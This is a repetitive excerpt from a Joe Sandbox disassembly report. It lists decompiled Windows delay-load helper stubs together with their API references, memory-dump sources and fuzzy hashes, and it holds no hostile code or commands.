                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: ed53e56fe1431cf1d1efcabd085c7e90cdd664511b77a18183d88fd946068231
                                                    • Instruction ID: 04cbd5e43457d847bde3d88b7d63d3b2372b01470eb145ab9c97750e7810127d
                                                    • Opcode Fuzzy Hash: ed53e56fe1431cf1d1efcabd085c7e90cdd664511b77a18183d88fd946068231
                                                    • Instruction Fuzzy Hash: 08B012E135C144AC3144710A2E03C3B010CC0C0F28330403FFB05C83C1DC406E013432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE44B() {
                                                    
                                                    				E00CDE85D(0xcfc60c, 0xd2305c); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde3fc
                                                    0x00cde403

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: ba6fc128ba983f12c0fb80883a90407a66f1f5df8c9b8785b49ed913924573fa
                                                    • Instruction ID: 0dd66c898d7a7d38e083d22871dabd9da1c95a6f9295d7440b493458543b6859
                                                    • Opcode Fuzzy Hash: ba6fc128ba983f12c0fb80883a90407a66f1f5df8c9b8785b49ed913924573fa
                                                    • Instruction Fuzzy Hash: 45B012E139C154BC3244B1092E02C37024CC5C0B14330C03FFB04C93C0D8404C042433
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE419() {
                                                    
                                                    				E00CDE85D(0xcfc60c, 0xd23054); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde3fc
                                                    0x00cde403

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 4c5be4f876e6dd869f7ca1f8ebe5acc3f8a0f13c07e3eb9059652928c42c280d
                                                    • Instruction ID: 0f9f964a9eaeead3f30d1b09614bf2daa097ae9cd16a2bb46b52704b6c9b14ef
                                                    • Opcode Fuzzy Hash: 4c5be4f876e6dd869f7ca1f8ebe5acc3f8a0f13c07e3eb9059652928c42c280d
                                                    • Instruction Fuzzy Hash: 2AB012E139C1547C324471092F02C37024CC4C0B14330C03FF704D93C0D8400C092433
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE423() {
                                                    
                                                    				E00CDE85D(0xcfc60c, 0xd2304c); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde3fc
                                                    0x00cde403

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 6aa7e65921fb1b63189c2dfc53e026387ac1ada2381d0825eba352d89b8ef1eb
                                                    • Instruction ID: 6aa3e0472f04e0bc3b12ce9d487fc5b8bf1f68f8a2c592f478a55009a72c2b3e
                                                    • Opcode Fuzzy Hash: 6aa7e65921fb1b63189c2dfc53e026387ac1ada2381d0825eba352d89b8ef1eb
                                                    • Instruction Fuzzy Hash: 8AB012F139C054BC3244B1096E02C37024CC5C0F14330803FFB04C93C0D8444E002433
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE593() {
                                                    
                                                    				E00CDE85D(0xcfc68c, 0xd23180); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde580
                                                    0x00cde587

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 1cf095dc4cbb5516949d570e6a1714b7e1e530dd1c745c1666b3221942f26ca9
                                                    • Instruction ID: 51b04d439dc282cd60ec641f6f5472eaec988e42e98ea4f9f6030bf7e587a752
                                                    • Opcode Fuzzy Hash: 1cf095dc4cbb5516949d570e6a1714b7e1e530dd1c745c1666b3221942f26ca9
                                                    • Instruction Fuzzy Hash: BCB012C135C1587E3144B25A3D42C37011CC4C0B19330413FF604C93C0F8400C102432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE5A7() {
                                                    
                                                    				E00CDE85D(0xcfc68c, 0xd23174); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde580
                                                    0x00cde587

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: a84cab41a747518621d55c943807c77346fda26ddb2d15eaa9bff7671fe3de31
                                                    • Instruction ID: 026f5336c5e159d15af7b1c95a0cdd375be9ed83bc01ae4dc7e5b43bd6cbf941
                                                    • Opcode Fuzzy Hash: a84cab41a747518621d55c943807c77346fda26ddb2d15eaa9bff7671fe3de31
                                                    • Instruction Fuzzy Hash: 20B012C175C1547C3144B15A7E43C37012CC4D0B19330423FF604C93C0FC400D112432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE5B1() {
                                                    
                                                    				E00CDE85D(0xcfc68c, 0xd23178); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde580
                                                    0x00cde587

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: b89f25a880f37bcb297f3eef057ba75c540da1dfe89b5e344ecb0cb088a9287e
                                                    • Instruction ID: d63a90cb83e5a700623de1a181942a44534b7fa04c82cc622b8972d2e63a435b
                                                    • Opcode Fuzzy Hash: b89f25a880f37bcb297f3eef057ba75c540da1dfe89b5e344ecb0cb088a9287e
                                                    • Instruction Fuzzy Hash: 95B012C135C2547C3184B15A7D43C37012CC4D0B19330423FF604C93C0F8400C502432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE546() {
                                                    
                                                    				E00CDE85D(0xcfc66c, 0xd23078); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde51f
                                                    0x00cde526

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: ebd7f5487998192a3d6dfafd57f73f0326e3827d1d16c459f4e35b0478a20dc2
                                                    • Instruction ID: 4edc2b211c1d517db0808f51904492a1d50d3363f06a74a664135d2c00720351
                                                    • Opcode Fuzzy Hash: ebd7f5487998192a3d6dfafd57f73f0326e3827d1d16c459f4e35b0478a20dc2
                                                    • Instruction Fuzzy Hash: 13B09281258145BC224461096E02C3A0118C091B18320422BB604C8280A8400C442436
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE50D() {
                                                    
                                                    				E00CDE85D(0xcfc66c, 0xd23090); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde51f
                                                    0x00cde526

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: b499c5a94cec49c7da0073d93b9165b5ee182b6e0e1991888a9eb03aa6ba4073
                                                    • Instruction ID: d901c0898de7032e455e40ebe96c451dd669aa2411eecfdaddb51fbf25402681
                                                    • Opcode Fuzzy Hash: b499c5a94cec49c7da0073d93b9165b5ee182b6e0e1991888a9eb03aa6ba4073
                                                    • Instruction Fuzzy Hash: 97B012C135C045BC310431293E06C3B011CC0D1F18330403FF610CC6C1B8400D043432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE528() {
                                                    
                                                    				E00CDE85D(0xcfc66c, 0xd23084); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde51f
                                                    0x00cde526

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: b89f841d95c0b845ab0ee70274fb06b173231146a4e6278e093c9facdfcd58fd
                                                    • Instruction ID: d9369021ef2d72499ab7fe389e816bde34870684eb8b5b518bcc91bac16c495e
                                                    • Opcode Fuzzy Hash: b89f841d95c0b845ab0ee70274fb06b173231146a4e6278e093c9facdfcd58fd
                                                    • Instruction Fuzzy Hash: DEB09281358085AD214461092E02C3A0518C091B18320802FB604C8280A8400C012432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE532() {
                                                    
                                                    				E00CDE85D(0xcfc66c, 0xd23080); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde51f
                                                    0x00cde526

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 1fd10d91d9f9df279b5432b12e151dce663ac2bcb2522751c66f93049d73bb21
                                                    • Instruction ID: 1d458e69cf1336875d8c97b457d07dbc85e014781e2114fdbf794699b44a57f4
                                                    • Opcode Fuzzy Hash: 1fd10d91d9f9df279b5432b12e151dce663ac2bcb2522751c66f93049d73bb21
                                                    • Instruction Fuzzy Hash: 62B09281258045BE214461092E02D3A0118C091B18320412FF604C8280A8400C002432
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 747564b174e68dd800eef8f1b377c566f9e2ced93376a546241ba11ada5c78d7
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: 747564b174e68dd800eef8f1b377c566f9e2ced93376a546241ba11ada5c78d7
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: a9ebd94dde72b00b745ca18f9542677e462782ac7f9ec5fa6b636d3c768642c1
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: a9ebd94dde72b00b745ca18f9542677e462782ac7f9ec5fa6b636d3c768642c1
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 7ae3ccf22d12ad5e4eb9a37b793cd4a2d225eac0290722713f2d1c9f2d3c5375
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: 7ae3ccf22d12ad5e4eb9a37b793cd4a2d225eac0290722713f2d1c9f2d3c5375
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 9834e53d724afc10a92121470adf7417b088ec847316550bb4aef95d13dd5ce9
                                                    • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                    • Opcode Fuzzy Hash: 9834e53d724afc10a92121470adf7417b088ec847316550bb4aef95d13dd5ce9
                                                    • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
